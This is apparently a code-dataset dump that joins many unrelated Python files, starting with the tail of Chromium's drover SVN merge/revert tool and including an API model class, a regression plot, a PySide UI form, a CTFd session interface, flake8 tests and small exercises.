command = ("upload " + str(revision) +
" --send_mail --no_presubmit --reviewers=" + author)
return runGcl(command)
def getSVNInfo(url, revision):
info = {}
svn_info = subprocess2.capture(
['svn', 'info', '--non-interactive', '%s@%s' % (url, revision)],
stderr=subprocess2.VOID).splitlines()
for line in svn_info:
match = re.search(r"(.*?):(.*)", line)
if match:
info[match.group(1).strip()] = match.group(2).strip()
return info
def isSVNDirty():
svn_status = subprocess2.check_output(['svn', 'status']).splitlines()
for line in svn_status:
match = re.search(r"^[^X?]", line)
if match:
return True
return False
def getAuthor(url, revision):
info = getSVNInfo(url, revision)
if (info.has_key("Last Changed Author")):
return info["Last Changed Author"]
return None
def isSVNFile(url, revision):
info = getSVNInfo(url, revision)
if (info.has_key("Node Kind")):
if (info["Node Kind"] == "file"):
return True
return False
def isSVNDirectory(url, revision):
info = getSVNInfo(url, revision)
if (info.has_key("Node Kind")):
if (info["Node Kind"] == "directory"):
return True
return False
def inCheckoutRoot(path):
info = getSVNInfo(path, "HEAD")
if (not info.has_key("Repository Root")):
return False
repo_root = info["Repository Root"]
info = getSVNInfo(os.path.dirname(os.path.abspath(path)), "HEAD")
if (info.get("Repository Root", None) != repo_root):
return True
return False
def getRevisionLog(url, revision):
"""Takes an svn url and gets the associated revision."""
svn_log = subprocess2.check_output(
['svn', 'log', url, '-r', str(revision)],
universal_newlines=True).splitlines(True)
# Don't include the header lines and the trailing "---..." line.
return ''.join(svn_log[3:-1])
def getSVNVersionInfo():
"""Extract version information from SVN"""
svn_info = subprocess2.check_output(['svn', '--version']).splitlines()
info = {}
for line in svn_info:
match = re.search(r"svn, version ((\d+)\.(\d+)\.(\d+))", line)
if match:
info['version'] = match.group(1)
info['major'] = int(match.group(2))
info['minor'] = int(match.group(3))
info['patch'] = int(match.group(4))
return info
return None
def isMinimumSVNVersion(major, minor, patch=0):
"""Test for minimum SVN version"""
return _isMinimumSVNVersion(getSVNVersionInfo(), major, minor, patch)
def _isMinimumSVNVersion(version, major, minor, patch=0):
"""Test for minimum SVN version, internal method"""
if not version:
return False
if (version['major'] > major):
return True
elif (version['major'] < major):
return False
if (version['minor'] > minor):
return True
elif (version['minor'] < minor):
return False
if (version['patch'] >= patch):
return True
else:
return False
def checkoutRevision(url, revision, branch_url, revert=False, pop=True):
files_info = getFileInfo(url, revision)
paths = getBestMergePaths2(files_info, revision)
export_map = getBestExportPathsMap2(files_info, revision)
command = 'svn checkout -N ' + branch_url
print command
os.system(command)
match = re.search(r"^[a-z]+://.*/(.*)", branch_url)
if match:
os.chdir(match.group(1))
# This line is extremely important due to the way svn behaves in the
# set-depths action. If parents aren't handled before children, the child
# directories get clobbered and the merge step fails.
paths.sort()
# Checkout the directories that already exist
for path in paths:
if (export_map.has_key(path) and not revert):
print "Exclude new directory " + path
continue
subpaths = path.split('/')
#In the normal case, where no url override is specified and it's just
# chromium source, it's necessary to remove the 'trunk' from the filepath,
# since in the checkout we include 'trunk' or 'branch/\d+'.
#
# However, when a url is specified we want to preserve that because it's
# a part of the filepath and necessary for path operations on svn (because
# frankly, we are checking out the correct top level, and not hacking it).
if pop:
subpaths.pop(0)
base = ''
for subpath in subpaths:
base += '/' + subpath
# This logic ensures that you don't empty out any directories
if not os.path.exists("." + base):
command = ('svn update --depth empty ' + "." + base)
print command
os.system(command)
if (revert):
files = getAllFilesInRevision(files_info)
else:
files = getExistingFilesInRevision(files_info)
for f in files:
# Prevent the tool from clobbering the src directory
if (f == ""):
continue
command = ('svn up ".' + f + '"')
print command
os.system(command)
def mergeRevision(url, revision):
paths = getBestMergePaths(url, revision)
export_map = getBestExportPathsMap(url, revision)
for path in paths:
if export_map.has_key(path):
continue
command = ('svn merge -N -r ' + str(revision-1) + ":" + str(revision) + " ")
command += " --ignore-ancestry "
command += " -x --ignore-eol-style "
command += url + path + "@" + str(revision) + " ." + path
print command
os.system(command)
def exportRevision(url, revision):
paths = getBestExportPathsMap(url, revision).keys()
paths.sort()
for path in paths:
command = ('svn export -N ' + url + path + "@" + str(revision) + " ." +
path)
print command
os.system(command)
command = 'svn add .' + path
print command
os.system(command)
def deleteRevision(url, revision):
paths = getBestDeletePathsMap(url, revision).keys()
paths.sort()
paths.reverse()
for path in paths:
command = "svn delete ." + path
print command
os.system(command)
def revertExportRevision(url, revision):
paths = getBestExportPathsMap(url, revision).keys()
paths.sort()
paths.reverse()
for path in paths:
command = "svn delete ." + path
print command
os.system(command)
def revertRevision(url, revision):
command = ('svn merge --ignore-ancestry -c -%d %s .' % (revision, url))
print command
os.system(command)
def getFileInfo(url, revision):
global files_info_
if (files_info_ != None):
return files_info_
svn_log = subprocess2.check_output(
['svn', 'log', url, '-r', str(revision), '-v']).splitlines()
info = []
for line in svn_log:
# A workaround to dump the (from .*) stuff, regex not so friendly in the 2nd
# pass...
match = re.search(r"(.*) \(from.*\)", line)
if match:
line = match.group(1)
match = re.search(file_pattern_, line)
if match:
info.append([match.group(1).strip(), match.group(2).strip(),
match.group(3).strip(),match.group(4).strip()])
files_info_ = info
return info
def getBestMergePaths(url, revision):
"""Takes an svn url and gets the associated revision."""
return getBestMergePaths2(getFileInfo(url, revision), revision)
def getBestMergePaths2(files_info, revision):
"""Takes an svn url and gets the associated revision."""
return list(set([f[2] for f in files_info]))
def getBestExportPathsMap(url, revision):
return getBestExportPathsMap2(getFileInfo(url, revision), revision)
def getBestExportPathsMap2(files_info, revision):
"""Takes an svn url and gets the associated revision."""
global export_map_
if export_map_:
return export_map_
result = {}
for file_info in files_info:
if (file_info[0] == "A"):
if(isSVNDirectory("svn://svn.chromium.org/chrome/" + file_info[1],
revision)):
result[file_info[2] + "/" + file_info[3]] = ""
export_map_ = result
return result
def getBestDeletePathsMap(url, revision):
return getBestDeletePathsMap2(getFileInfo(url, revision), revision)
def getBestDeletePathsMap2(files_info, revision):
"""Takes an svn url and gets the associated revision."""
global delete_map_
if delete_map_:
return delete_map_
result = {}
for file_info in files_info:
if (file_info[0] == "D"):
if(isSVNDirectory("svn://svn.chromium.org/chrome/" + file_info[1],
revision)):
result[file_info[2] + "/" + file_info[3]] = ""
delete_map_ = result
return result
def getExistingFilesInRevision(files_info):
"""Checks for existing files in the revision.
Anything that's A will require special treatment (either a merge or an
export + add)
"""
return ['%s/%s' % (f[2], f[3]) for f in files_info if f[0] != 'A']
def getAllFilesInRevision(files_info):
"""Checks for existing files in the revision.
Anything that's A will require special treatment (either a merge or an
export + add)
"""
return ['%s/%s' % (f[2], f[3]) for f in files_info]
def getSVNAuthInfo(folder=None):
"""Fetches SVN authorization information in the subversion auth folder and
returns it as a dictionary of dictionaries."""
if not folder:
if sys.platform == 'win32':
folder = '%%APPDATA%\\Subversion\\auth'
else:
folder = '~/.subversion/auth'
folder = os.path.expandvars(os.path.expanduser(folder))
svn_simple_folder = os.path.join(folder, 'svn.simple')
results = {}
try:
for auth_file in os.listdir(svn_simple_folder):
# Read the SVN auth file, convert it into a dictionary, and store it.
results[auth_file] = dict(re.findall(r'K [0-9]+\n(.*)\nV [0-9]+\n(.*)\n',
open(os.path.join(svn_simple_folder, auth_file)).read()))
except Exception as _:
pass
return results
def getCurrentSVNUsers(url):
"""Tries to fetch the current SVN in the current checkout by scanning the
SVN authorization folder for a match with the current SVN URL."""
netloc = urlparse.urlparse(url)[1]
auth_infos = getSVNAuthInfo()
results = []
for _, auth_info in auth_infos.iteritems():
if ('svn:realmstring' in auth_info
and netloc in auth_info['svn:realmstring']):
username = auth_info['username']
results.append(username)
if 'google.com' in username:
results.append(username.replace('google.com', 'chromium.org'))
return results
def prompt(question):
while True:
print question + " [y|n]:",
answer = sys.stdin.readline()
if answer.lower().startswith('n'):
return False
elif answer.lower().startswith('y'):
return True
def text_prompt(question, default):
print question + " [" + default + "]:"
answer = sys.stdin.readline()
if answer.strip() == "":
return default
return answer
def drover(options, args):
revision = options.revert or options.merge
# Initialize some variables used below. They can be overwritten by
# the drover.properties file.
BASE_URL = "svn://svn.chromium.org/chrome"
REVERT_ALT_URLS = ['svn://svn.chromium.org/blink',
'svn://svn.chromium.org/chrome-internal',
'svn://svn.chromium.org/native_client']
TRUNK_URL = BASE_URL + "/trunk/src"
BRANCH_URL = BASE_URL + "/branches/$branch/src"
SKIP_CHECK_WORKING = True
PROMPT_FOR_AUTHOR = False
NO_ALT_URLS = options.no_alt_urls
DEFAULT_WORKING = "drover_" + str(revision)
if options.branch:
DEFAULT_WORKING += ("_" + options.branch)
if not isMinimumSVNVersion(1, 5):
print "You need to use at least SVN version 1.5.x"
return 1
# Override the default properties if there is a drover.properties file.
global file_pattern_
if os.path.exists("drover.properties"):
print 'Using options from %s' % os.path.join(
os.getcwd(), 'drover.properties')
FILE_PATTERN = file_pattern_
f = open("drover.properties")
exec(f)
f.close()
if FILE_PATTERN:
file_pattern_ = FILE_PATTERN
NO_ALT_URLS = True
if options.revert and options.branch:
print 'Note: --branch is usually not needed for reverts.'
url = BRANCH_URL.replace("$branch", options.branch)
elif options.merge and options.sbranch:
url = BRANCH_URL.replace("$branch", options.sbranch)
elif options.revert:
url = options.url or BASE_URL
file_pattern_ = r"[ ]+([MADUC])[ ]+((/.*)/(.*))"
else:
url = TRUNK_URL
working = options.workdir or DEFAULT_WORKING
if options.local:
working = os.getcwd()
if not inCheckoutRoot(working):
print "'%s' appears not to be the root of a working copy" % working
return 1
if (isSVNDirty() and not
prompt("Working copy contains uncommitted files. Continue?")):
return 1
if options.revert and not NO_ALT_URLS and not options.url:
for cur_url in [url] + REVERT_ALT_URLS:
try:
commit_date_str = getSVNInfo(
cur_url, options.revert).get('Last Changed Date', 'x').split()[0]
commit_date = datetime.datetime.strptime(commit_date_str, '%Y-%m-%d')
if (datetime.datetime.now() - commit_date).days < 180:
if cur_url != url:
print 'Guessing svn repo: %s.' % cur_url,
print 'Use --no-alt-urls to disable heuristic.'
url = cur_url
break
except ValueError:
pass
command = 'svn log ' + url + " -r "+str(revision) + " -v"
os.system(command)
if not (options.revertbot or prompt("Is this the correct revision?")):
return 0
if (os.path.exists(working)) and not options.local:
if not (options.revertbot or SKIP_CHECK_WORKING or
prompt("Working directory: '%s' already exists, clobber?" % working)):
return 0
gclient_utils.rmtree(working)
if not options.local:
os.makedirs(working)
os.chdir(working)
if options.merge:
action = "Merge"
if not options.local:
branch_url = BRANCH_URL.replace("$branch", options.branch)
# Checkout everything but stuff that got added into a new dir
checkoutRevision(url, revision, branch_url)
# Merge everything that changed
mergeRevision(url, revision)
# "Export" files that were added from the source and add them to branch
exportRevision(url, revision)
# Delete directories that were deleted (file deletes are handled in the
# merge).
deleteRevision(url, revision)
elif options.revert:
action = "Revert"
pop_em = not options.url
checkoutRevision(url, revision, url, True, pop_em)
revertRevision(url, revision)
revertExportRevision(url, revision)
# Check the base url so we actually find the author who made the change
if options.auditor:
author = options.auditor
else:
author = getAuthor(url, revision)
if not author:
author = getAuthor(TRUNK_URL, revision)
# Check that the author of the CL is different than the user making
# the revert. If they're the same, then we'll want to prompt the user
# for a different reviewer to TBR.
current_users = getCurrentSVNUsers(BASE_URL)
is_self_revert = options.revert and author in current_users
filename = str(revision)+".txt"
out = open(filename,"w")
drover_title = '%s %s' % (action, revision)
revision_log = getRevisionLog(url, revision).splitlines()
if revision_log:
commit_title = revision_log[0]
# Limit title to 68 chars so git log --oneline is <80 chars.
max_commit_title = 68 - (len(drover_title) + 3)
if len(commit_title) > max_commit_title:
commit_title = commit_title[:max_commit_title-3] + '...'
drover_title += ' "%s"' % commit_title
out.write(drover_title + '\n\n')
for line in revision_log:
out.write('> %s\n' % line)
if author:
out.write("\nTBR=" + author)
out.close()
change_cmd = 'change ' + str(revision) + " " + filename
if options.revertbot:
if sys.platform == 'win32':
os.environ['SVN_EDITOR'] = 'cmd.exe /c exit'
else:
os.environ['SVN_EDITOR'] = 'true'
runGcl(change_cmd)
os.unlink(filename)
if options.local:
return 0
print author
print revision
print ("gcl upload " + str(revision) +
" --send_mail --no_presubmit --reviewers=" + author)
if options.revertbot or prompt("Would you like to upload?"):
if PROMPT_FOR_AUTHOR or is_self_revert:
author = text_prompt("Enter new author or press enter to accept default",
author)
if options.revertbot and options.revertbot_reviewers:
author += ","
author += options.revertbot_reviewers
gclUpload(revision, author)
else:
print "Deleting the changelist."
print "gcl delete " + str(revision)
runGcl("delete " + str(revision))
return 0
# We commit if the reverbot is set to commit automatically, or if this is
# not the revertbot and the user agrees.
if options.revertbot_commit or (not options.revertbot and
prompt("Would you like to commit?")):
print "gcl commit " + str(revision) + " --no_presubmit --force"
return runGcl("commit " + str(revision) + " --no_presubmit --force")
else:
return 0
def main():
option_parser = optparse.OptionParser(usage=USAGE % {"app": sys.argv[0]})
option_parser.add_option('-m', '--merge', type="int",
help='Revision to merge from trunk to branch')
option_parser.add_option('-b', '--branch',
help='Branch to revert or merge from')
option_parser.add_option('-l', '--local', action='store_true',
help='Local working copy to merge to')
option_parser.add_option('-s', '--sbranch',
help='Source branch for merge')
option_parser.add_option('-r', '--revert', type="int",
help='Revision to revert')
option_parser.add_option('-w', '--workdir',
help='subdir to use for the revert')
option_parser.add_option('-u', '--url',
help='svn url to use for the revert')
option_parser.add_option('-a', '--auditor',
help='overrides the author for reviewer')
option_parser.add_option('--revertbot', action='store_true',
default=False)
option_parser.add_option('--no-alt-urls', action='store_true',
help='Disable heuristics used to determine svn url')
option_parser.add_option('--revertbot-commit', action='store_true',
default=False)
option_parser.add_option('--revertbot-reviewers')
options, args = option_parser.parse_args()
if not options.merge and not options.revert:
option_parser.error("You need at least --merge or --revert")
return 1
if options.merge and not (options.branch or options.local):
option_parser.error("--merge requires --branch or --local")
return 1
if options.local and (options.revert or options.branch):
option_parser.error("--local cannot be used with --revert or --branch")
return 1
return drover(options, args)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
MagicTelecomAPILib.Models.Account
This file was automatically generated by APIMATIC v2.0 on 06/22/2016
"""
from MagicTelecomAPILib.APIHelper import APIHelper
class Account(object):
"""Implementation of the 'Account' model.
TODO: type model description here.
Attributes:
number (string): TODO: type description here.
roles (list of string): TODO: type description here.
email (string): TODO: type description here.
contact_number (string): TODO: type description here.
firstname (string): TODO: type description here.
lastname (string): TODO: type description here.
"""
def __init__(self,
**kwargs):
"""Constructor for the Account class
Args:
**kwargs: Keyword Arguments in order to initialise the
object. Any of the attributes in this object are able to
be set through the **kwargs of the constructor. The values
that can be supplied and their types are as follows::
number -- string -- Sets the attribute number
roles -- list of string -- Sets the attribute roles
email -- string -- Sets the attribute email
contact_number -- string -- Sets the attribute contact_number
firstname -- string -- Sets the attribute firstname
lastname -- string -- Sets the attribute lastname
"""
# Set all of the parameters to their default values
self.number = None
self.roles = None
self.email = None
self.contact_number = None
self.firstname = None
self.lastname = None
# Create a mapping from API property names to Model property names
replace_names = {
"number": "number",
"roles": "roles",
"email": "email",
"contact_number": "contact_number",
"firstname": "firstname",
"lastname": "lastname",
}
# Parse all of the Key-Value arguments
if kwargs is not None:
for key in kwargs:
# Only add arguments that are actually part of this object
if key in replace_names:
setattr(self, replace_names[key], kwargs[key])
def resolve_names(self):
"""Creates a dictionary representation of this object.
This method converts an object to a dictionary that represents the
format that the model should be in when passed into an API Request.
Because of this, the generated dictionary may have different
property names to that of the model itself.
Returns:
dict: The dictionary representing the object.
"""
# Create a mapping from Model property names to API property names
replace_names = {
"number": "number",
"roles": "roles",
"email": "email",
"contact_number": "contact_number",
"firstname": "firstname",
"lastname": "lastname",
}
retval = dict()
return APIHelper.resolve_names(self, replace_names, retval)
|
nilq/baby-python
|
python
|
# Linear regression on iris dataset
import numpy as np
import matplotlib.pyplot as plt
import os
figdir = os.path.join(os.environ["PYPROBML"], "figures")
def save_fig(fname): plt.savefig(os.path.join(figdir, fname))
import seaborn as sns
from sklearn.linear_model import LinearRegression
from sklearn import datasets
iris = datasets.load_iris()
xidx = 2
ys = [1, 3]
for yidx in ys:
X = iris.data[:, xidx:xidx+1] # we only take the first feature
Y = iris.data[:, yidx:yidx+1]
linreg = LinearRegression()
linreg.fit(X, Y)
xs = np.arange(np.min(X), np.max(X), 0.1).reshape(-1,1)
yhat = linreg.predict(xs)
plt.plot(xs, yhat)
sns.scatterplot(x=X[:,0], y=Y[:,0])
plt.xlabel(iris.feature_names[xidx])
plt.ylabel(iris.feature_names[yidx])
plt.xlim(np.min(X), np.max(X))
plt.ylim(np.min(Y), np.max(Y))
fname = "iris-linreg{}".format(yidx)
save_fig(fname)
plt.show()
|
nilq/baby-python
|
python
|
from clases.dia_mañana import *
from clases.yinyang import *
from clases.alternativa import *
if __name__ == "__main__":
print("¿Qué ejercicio quieres ver?:", "\n","1)Dia del mañana", "\n","2)Inmortal", "\n","3)Alternativa herencia multiple")
n =int(input("Número del ejercicio: "))
if n == 1:
destrucion = str(input("¿Qué ciudad quieres destruir, Los Ángeles o Nueva York?"))
if destrucion == "Los Ángeles":
la = LosAngeles()
del la
elif destrucion == "Nueva York":
ny = NuevaYork()
del ny
else:
print("La ciudad no es válida")
if n == 2:
yin = Yin()
yang = Yang()
del(yang)
if n == 3:
pared_norte = Pared("NORTE")
pared_oeste = Pared("OESTE")
pared_sur = Pared("SUR")
pared_este = Pared("ESTE")
ventana_norte = InterfazCristal(pared_norte, 0.5)
ventana_oeste = InterfazCristal(pared_oeste, 1)
ventana_sur = InterfazCristal(pared_sur, 2)
ventana_este = InterfazCristal(pared_este, 1)
casa = Casa(4, [pared_norte, pared_oeste, pared_sur, pared_este], [ventana_norte, ventana_este, ventana_oeste,ventana_sur])
print(casa.superficie_acristalada())
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'expstatus.ui'
##
## Created by: Qt User Interface Compiler version 5.15.0
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import (
QCoreApplication,
QDate,
QDateTime,
QMetaObject,
QObject,
QPoint,
QRect,
QSize,
Qt,
QTime,
QUrl,
)
from PySide2.QtGui import (
QBrush,
QColor,
QConicalGradient,
QCursor,
QFont,
QFontDatabase,
QIcon,
QKeySequence,
QLinearGradient,
QPainter,
QPalette,
QPixmap,
QRadialGradient,
)
from PySide2.QtWidgets import *
class Ui_ExposureStatus(object):
def setupUi(self, ExposureStatus):
if not ExposureStatus.objectName():
ExposureStatus.setObjectName(u"ExposureStatus")
ExposureStatus.resize(260, 100)
ExposureStatus.setMinimumSize(QSize(260, 100))
ExposureStatus.setMaximumSize(QSize(520, 200))
font = QFont()
font.setPointSize(8)
ExposureStatus.setFont(font)
ExposureStatus.setIconSize(QSize(15, 15))
self.centralwidget = QWidget(ExposureStatus)
self.centralwidget.setObjectName(u"centralwidget")
self.gridLayout = QGridLayout(self.centralwidget)
self.gridLayout.setObjectName(u"gridLayout")
self.label_status = QLabel(self.centralwidget)
self.label_status.setObjectName(u"label_status")
font1 = QFont()
font1.setPointSize(12)
font1.setBold(True)
font1.setWeight(75)
self.label_status.setFont(font1)
self.label_status.setFrameShape(QFrame.StyledPanel)
self.label_status.setFrameShadow(QFrame.Sunken)
self.label_status.setAlignment(Qt.AlignCenter)
self.gridLayout.addWidget(self.label_status, 0, 0, 1, 1)
self.splitter = QSplitter(self.centralwidget)
self.splitter.setObjectName(u"splitter")
self.splitter.setOrientation(Qt.Horizontal)
self.label_integrating = QLabel(self.splitter)
self.label_integrating.setObjectName(u"label_integrating")
font2 = QFont()
font2.setPointSize(12)
font2.setBold(False)
font2.setWeight(50)
self.label_integrating.setFont(font2)
self.label_integrating.setFrameShape(QFrame.StyledPanel)
self.label_integrating.setFrameShadow(QFrame.Sunken)
self.label_integrating.setLineWidth(2)
self.label_integrating.setAlignment(Qt.AlignCenter)
self.splitter.addWidget(self.label_integrating)
self.label_reading = QLabel(self.splitter)
self.label_reading.setObjectName(u"label_reading")
self.label_reading.setFont(font2)
self.label_reading.setFrameShape(QFrame.StyledPanel)
self.label_reading.setFrameShadow(QFrame.Sunken)
self.label_reading.setLineWidth(2)
self.label_reading.setAlignment(Qt.AlignCenter)
self.splitter.addWidget(self.label_reading)
self.gridLayout.addWidget(self.splitter, 1, 0, 1, 1)
ExposureStatus.setCentralWidget(self.centralwidget)
self.retranslateUi(ExposureStatus)
QMetaObject.connectSlotsByName(ExposureStatus)
# setupUi
def retranslateUi(self, ExposureStatus):
ExposureStatus.setWindowTitle(
QCoreApplication.translate("ExposureStatus", u"ExpStatus", None)
)
# if QT_CONFIG(tooltip)
ExposureStatus.setToolTip(
QCoreApplication.translate("ExposureStatus", u"azcam exposure status", None)
)
# endif // QT_CONFIG(tooltip)
# if QT_CONFIG(whatsthis)
ExposureStatus.setWhatsThis("")
# endif // QT_CONFIG(whatsthis)
self.label_status.setText("")
self.label_integrating.setText(
QCoreApplication.translate("ExposureStatus", u"Exposing", None)
)
self.label_reading.setText(
QCoreApplication.translate("ExposureStatus", u"Reading", None)
)
# retranslateUi
|
nilq/baby-python
|
python
|
first = list(input())
sec = list(input())
te = first + sec
te.sort()
third = list(input())
third.sort()
if te==third:
print("YES")
else:
print("NO")
s,i=sorted,input;print('YNEOS'[s(i()+i())!=s(i())::2])
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from ..components import *
from ..container import *
from ..elements import *
__all__ = ['regression_report']
def regression_report(truth, predict, label=None, per_target=True,
target_names=None, title=None):
"""Regression report.
This method will compose a standard regression report, including
the summary and the result attachment.
Parameters
----------
truth : np.ndarray
Ground truth (correct) target values.
predict : np.ndarray
Predicted target values.
label : np.ndarray | list
If specified, will compute the regression scores for each label class.
per_target : bool
Whether or not to compute the regression score for each dimension?
(default True)
target_names : np.ndarray | list
Name of each dimension in regression results.
If not specified, will use the coordinate of each dimension, e.g.,
"(0,0,0)".
title : str
Optional title of this regression summary table.
"""
children = [
regression_summary(
truth=truth, predict=predict, label=label, per_target=per_target,
target_names=target_names
),
regression_result_attachment(
truth=truth, predict=predict, title='Regression Result'
)
]
if title:
return Section(title, children)
return Group(children)
|
nilq/baby-python
|
python
|
# encoding: utf-8
# Copyright 2011 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
def nullUpgradeStep(setupTool):
'''A null step for when a profile upgrade requires no custom activity.'''
|
nilq/baby-python
|
python
|
#range_test function definition goes here
def range_test(num):
if num < 1 or num > 500:
return False
else:
return True
num = int(input("Enter a number: "))
if range_test(num):
print( "{:d} is in range.".format(num))
else:
print("The number you entered is outside the range!")
|
nilq/baby-python
|
python
|
# Python - 3.6.0
def is_sator_square(tablet):
n = len(tablet)
for r in range(n):
for c in range(n):
if not (tablet[r][c] == tablet[-(r + 1)][-(c + 1)] == tablet[c][r] == tablet[-(c + 1)][-(r + 1)]):
return False
return True
|
nilq/baby-python
|
python
|
from platform import system, release
from sys import version_info
from configparser import ConfigParser
from pyrfc import Connection, get_nwrfclib_version
config = ConfigParser()
config.read('pyrfc.cfg')
params = config._sections['test']
conn = Connection(**params)
print(('Platform:', system(), release()))
print(('Python version:', version_info))
print(('SAP NW RFC:', get_nwrfclib_version()))
result = conn.call('/COE/RBP_PAM_SERVICE_ORD_CHANG', IV_ORDERID='4711', IT_NOTICE_NOTIFICATION=[{'': 'ABCD'}, {'': 'XYZ'}])
for line in result['ET_STRING']:
print(line)
for line in result['ET_TABLE']:
print(line)
result = conn.call('/COE/RBP_PAM_SERVICE_ORD_CHANG', IV_ORDERID='4711', IT_NOTICE_NOTIFICATION=['ABCD', 'XYZ'])
for line in result['ET_STRING']:
print(line)
for line in result['ET_TABLE']:
print(line)
|
nilq/baby-python
|
python
|
import platform, sys
if platform.system() == 'Windows': # pragma: no cover
WIN = True
else:
WIN = False
# True if we are running on Python 2.
PY2 = sys.version_info[0] == 2
if not PY2: # pragma: no cover
from urllib.parse import quote, unquote
string_type = str
unicode_text = str
byte_string = bytes
wsgi_string = str
def u_(s):
return str(s)
def bytes_(s):
return str(s).encode('ascii', 'strict')
def percent_encode(string, safe, encoding):
return quote(string, safe, encoding, errors='strict')
def percent_decode(string):
return unquote(string)
else: # pragma: no cover
from urllib import quote, unquote
string_type = basestring
unicode_text = unicode
byte_string = str
wsgi_string = str
def u_(s):
return unicode(s, 'utf-8')
def bytes_(s):
return str(s)
def percent_encode(string, **kwargs):
encoding = kwargs.pop('encoding')
return quote(string.encode(encoding), **kwargs)
def percent_decode(string):
return unquote(string)
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
|
nilq/baby-python
|
python
|
"""Tests for flake8.plugins.manager.PluginManager."""
import mock
from flake8.plugins import manager
def create_entry_point_mock(name):
"""Create a mocked EntryPoint."""
ep = mock.Mock(spec=['name'])
ep.name = name
return ep
@mock.patch('entrypoints.get_group_all')
def test_calls_entrypoints_on_instantiation(get_group_all):
"""Verify that we call get_group_all when we create a manager."""
get_group_all.return_value = []
manager.PluginManager(namespace='testing.entrypoints')
get_group_all.assert_called_once_with('testing.entrypoints')
@mock.patch('entrypoints.get_group_all')
def test_calls_entrypoints_creates_plugins_automaticaly(get_group_all):
"""Verify that we create Plugins on instantiation."""
get_group_all.return_value = [
create_entry_point_mock('T100'),
create_entry_point_mock('T200'),
]
plugin_mgr = manager.PluginManager(namespace='testing.entrypoints')
get_group_all.assert_called_once_with('testing.entrypoints')
assert 'T100' in plugin_mgr.plugins
assert 'T200' in plugin_mgr.plugins
assert isinstance(plugin_mgr.plugins['T100'], manager.Plugin)
assert isinstance(plugin_mgr.plugins['T200'], manager.Plugin)
@mock.patch('entrypoints.get_group_all')
def test_handles_mapping_functions_across_plugins(get_group_all):
"""Verify we can use the PluginManager call functions on all plugins."""
entry_point_mocks = [
create_entry_point_mock('T100'),
create_entry_point_mock('T200'),
]
get_group_all.return_value = entry_point_mocks
plugin_mgr = manager.PluginManager(namespace='testing.entrypoints')
plugins = [plugin_mgr.plugins[name] for name in plugin_mgr.names]
assert list(plugin_mgr.map(lambda x: x)) == plugins
@mock.patch('entrypoints.get_group_all')
def test_local_plugins(get_group_all):
"""Verify PluginManager can load given local plugins."""
get_group_all.return_value = []
plugin_mgr = manager.PluginManager(
namespace='testing.entrypoints',
local_plugins=['X = path.to:Plugin']
)
assert plugin_mgr.plugins['X'].entry_point.module_name == 'path.to'
|
nilq/baby-python
|
python
|
PyV8 = "PyV8"
Node = "Node"
JavaScriptCore = "JavaScriptCore"
SpiderMonkey = "SpiderMonkey"
JScript = "JScript"
PhantomJS = "PhantomJS"
SlimerJS = "SlimerJS"
Nashorn = "Nashorn"
Deno = "Deno"
|
nilq/baby-python
|
python
|
from flask.sessions import SessionInterface, SessionMixin
from flask.json.tag import TaggedJSONSerializer
from werkzeug.datastructures import CallbackDict
from itsdangerous import BadSignature, want_bytes
from CTFd.cache import cache
from CTFd.utils import text_type
from CTFd.utils.security.signing import sign, unsign
from uuid import uuid4
import six
def total_seconds(td):
return td.days * 60 * 60 * 24 + td.seconds
class CachedSession(CallbackDict, SessionMixin):
"""
This code is mostly based off of the ServerSideSession from Flask-Session.
https://github.com/fengsp/flask-session/blob/master/flask_session/sessions.py#L37
"""
def __init__(self, initial=None, sid=None, permanent=None):
def on_update(self):
self.modified = True
CallbackDict.__init__(self, initial, on_update)
self.sid = sid
if permanent:
self.permanent = permanent
self.modified = False
def regenerate(self):
cache.delete(self.sid)
# Empty current sid and mark modified so the interface will give it a new one.
self.sid = None
self.modified = True
class CachingSessionInterface(SessionInterface):
"""
This code is partially based off of the RedisSessionInterface from Flask-Session with updates to properly
interoperate with Flask-Caching and be more inline with modern Flask (i.e. doesn't use pickle).
https://github.com/fengsp/flask-session/blob/master/flask_session/sessions.py#L90
"""
serializer = TaggedJSONSerializer()
session_class = CachedSession
def _generate_sid(self):
return str(uuid4())
def __init__(self, key_prefix, use_signer=True, permanent=False):
self.key_prefix = key_prefix
self.use_signer = use_signer
self.permanent = permanent
def open_session(self, app, request):
sid = request.cookies.get(app.session_cookie_name)
if not sid:
sid = self._generate_sid()
return self.session_class(sid=sid, permanent=self.permanent)
if self.use_signer:
try:
sid_as_bytes = unsign(sid)
sid = sid_as_bytes.decode()
except BadSignature:
sid = self._generate_sid()
return self.session_class(sid=sid, permanent=self.permanent)
if not six.PY2 and not isinstance(sid, text_type):
sid = sid.decode("utf-8", "strict")
val = cache.get(self.key_prefix + sid)
if val is not None:
try:
data = self.serializer.loads(val)
return self.session_class(data, sid=sid)
except Exception:
return self.session_class(sid=sid, permanent=self.permanent)
return self.session_class(sid=sid, permanent=self.permanent)
def save_session(self, app, session, response):
domain = self.get_cookie_domain(app)
path = self.get_cookie_path(app)
if not session:
if session.modified:
cache.delete(self.key_prefix + session.sid)
response.delete_cookie(
app.session_cookie_name, domain=domain, path=path
)
return
if session.modified:
httponly = self.get_cookie_httponly(app)
secure = self.get_cookie_secure(app)
expires = self.get_expiration_time(app, session)
samesite = self.get_cookie_samesite(app)
val = self.serializer.dumps(dict(session))
if session.sid is None:
session.sid = self._generate_sid()
cache.set(
key=self.key_prefix + session.sid,
value=val,
timeout=total_seconds(app.permanent_session_lifetime),
)
if self.use_signer:
session_id = sign(want_bytes(session.sid))
else:
session_id = session.sid
response.set_cookie(
app.session_cookie_name,
session_id,
expires=expires,
httponly=httponly,
domain=domain,
path=path,
secure=secure,
samesite=samesite,
)
|
nilq/baby-python
|
python
|
import math
n = int(input("Enter the number till where the series ius to be printed = "))
for i in range(1,n+1):
k = math.pow(i,3)
j = k + 2*i
print(j)
|
nilq/baby-python
|
python
|
#Write a function that prompts user to input his/her full name.
#After user enter's his/her full name, split it and store it in variables first_name and last_name.
count=0
k=0
name=str(input("Enter your full name: "))
